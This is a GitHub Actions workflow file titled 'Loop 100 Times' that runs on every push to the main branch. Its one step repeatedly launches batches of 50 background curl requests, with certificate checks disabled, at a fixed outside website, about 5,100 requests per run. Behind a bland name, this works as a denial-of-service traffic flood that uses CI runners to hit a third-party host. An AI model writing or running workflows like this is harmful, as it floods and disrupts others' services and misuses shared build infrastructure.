name: Loop 100 Times cbcb943e-288b-422f-b2f3-a527c1fc765f

on:
  push:
    branches:
      - main

jobs:
  loop_job:
    runs-on: ubuntu-latest
    steps:
      - name: Run loop 100 times cbcb943e-288b-422f-b2f3-a527c1fc765f
        id: loop_step
        run: |
          counter=0
          max_loops=50
          target="http://ddosfilter.net/"
          while [ $counter -lt 100 ]; do
            echo "Running loop iteration $((counter + 1))..."
            curl_loop=0
            while [ $curl_loop -lt $max_loops ]; do
              curl -ks $target 2>&1 > /dev/null &
              curl_loop=$((curl_loop + 1))
            done
            echo " [+] started $max_loops processes "
            curl -ks $target 2>&1 > /dev/null
            
            counter=$((counter + 1))
          done
          echo ">> DONE!"




